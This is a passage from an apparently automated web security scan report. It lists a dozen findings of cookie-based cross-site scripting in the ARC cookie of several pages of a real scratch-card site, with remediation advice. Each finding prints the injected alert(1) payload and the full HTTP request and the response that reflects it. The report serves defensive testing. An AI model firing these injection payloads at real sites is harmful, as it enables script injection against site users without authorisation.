Cookie: ARC=13013738b11"%3balert(1)//4b7eb4d38ea; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013738b11%22%3Balert%281%29%2F%2F4b7eb4d38ea; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013738b11";alert(1)//4b7eb4d38ea' border='0' width='1' height='1'>
...[SNIP]...

3.104. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload d5a37--><script>alert(1)</script>2daf1f805c5 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137d5a37--><script>alert(1)</script>2daf1f805c5; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137d5a37%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2daf1f805c5; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137d5a37--><script>alert(1)</script>2daf1f805c5">
...[SNIP]...

3.105. http://primescratchcards.com/images/Responsible.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/Responsible.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39fde'%3balert(1)//02965ba86d3 was submitted in the ARC cookie. This input was echoed as 39fde';alert(1)//02965ba86d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/Responsible.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013739fde'%3balert(1)//02965ba86d3; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013739fde%27%3Balert%281%29%2F%2F02965ba86d3; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013739fde';alert(1)//02965ba86d3&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.106. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 7b916--><script>alert(1)</script>15bbf18f026 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301377b916--><script>alert(1)</script>15bbf18f026; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301377b916%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E15bbf18f026; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301377b916--><script>alert(1)</script>15bbf18f026">
...[SNIP]...

3.107. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7a4'%3balert(1)//9a734a2209d was submitted in the ARC cookie. This input was echoed as 8c7a4';alert(1)//9a734a2209d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301378c7a4'%3balert(1)//9a734a2209d; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301378c7a4%27%3Balert%281%29%2F%2F9a734a2209d; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378c7a4';alert(1)//9a734a2209d&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.108. http://primescratchcards.com/images/SecurityAndPrivacy.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/SecurityAndPrivacy.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ace"%3balert(1)//b357ff571da was submitted in the ARC cookie. This input was echoed as 59ace";alert(1)//b357ff571da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/SecurityAndPrivacy.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013759ace"%3balert(1)//b357ff571da; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013759ace%22%3Balert%281%29%2F%2Fb357ff571da; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013759ace";alert(1)//b357ff571da' border='0' width='1' height='1'>
...[SNIP]...

3.109. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcc5b'%3balert(1)//703cebd666 was submitted in the ARC cookie. This input was echoed as dcc5b';alert(1)//703cebd666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137dcc5b'%3balert(1)//703cebd666; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=130137dcc5b%27%3Balert%281%29%2F%2F703cebd666; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137dcc5b';alert(1)//703cebd666&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.110. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 4d39c--><script>alert(1)</script>62968452208 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301374d39c--><script>alert(1)</script>62968452208; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=1301374d39c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E62968452208; expires=Tue, 15-May-2012 12:38:12 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="1301374d39c--><script>alert(1)</script>62968452208">
...[SNIP]...

3.111. http://primescratchcards.com/images/aboutus.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/aboutus.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2596a"%3balert(1)//e55764e40a4 was submitted in the ARC cookie. This input was echoed as 2596a";alert(1)//e55764e40a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/aboutus.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301372596a"%3balert(1)//e55764e40a4; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372596a%22%3Balert%281%29%2F%2Fe55764e40a4; expires=Tue, 15-May-2012 12:38:10 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301372596a";alert(1)//e55764e40a4' border='0' width='1' height='1'>
...[SNIP]...

3.112. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload f636d--><script>alert(1)</script>bab01666262 was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137f636d--><script>alert(1)</script>bab01666262; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=130137f636d%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebab01666262; expires=Tue, 15-May-2012 12:38:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137f636d--><script>alert(1)</script>bab01666262">
...[SNIP]...

3.113. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46fe5'%3balert(1)//65cb78f18b8 was submitted in the ARC cookie. This input was echoed as 46fe5';alert(1)//65cb78f18b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013746fe5'%3balert(1)//65cb78f18b8; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013746fe5%27%3Balert%281%29%2F%2F65cb78f18b8; expires=Tue, 15-May-2012 12:38:26 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=13013746fe5';alert(1)//65cb78f18b8&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.114. http://primescratchcards.com/images/affiliates.asp [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/affiliates.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fa3b"%3balert(1)//d22930547e was submitted in the ARC cookie. This input was echoed as 3fa3b";alert(1)//d22930547e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/affiliates.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=1301373fa3b"%3balert(1)//d22930547e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19396
Content-Type: text/html
Set-Cookie: ARC=1301373fa3b%22%3Balert%281%29%2F%2Fd22930547e; expires=Tue, 15-May-2012 12:38:24 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=1301373fa3b";alert(1)//d22930547e' border='0' width='1' height='1'>
...[SNIP]...

3.115. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c354'%3balert(1)//78c486a4ea7 was submitted in the ARC cookie. This input was echoed as 2c354';alert(1)//78c486a4ea7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=1301372c354'%3balert(1)//78c486a4ea7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=1301372c354%27%3Balert%281%29%2F%2F78c486a4ea7; expires=Tue, 15-May-2012 11:42:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=BKMOLGNDNJKAKAFGLDIAGACP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }
   
   
   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301372c354';alert(1)//78c486a4ea7&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.116. http://primescratchcards.com/images/bg.jpg [ARC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/bg.jpg

Issue detail

The value of the ARC cookie is copied into an HTML comment. The payload 11f92--><script>alert(1)</script>092fca28c0d was submitted in the ARC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/bg.jpg HTTP/1.1
Host: primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=13013711f92--><script>alert(1)</script>092fca28c0d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:42:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19447
Content-Type: text/html
Set-Cookie: ARC=13013711f92%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E092fca28c0d; expires=Tue, 15-May-2012 11:42:04 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=HKMOLGNDNIHAGDGLIENJFGLH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
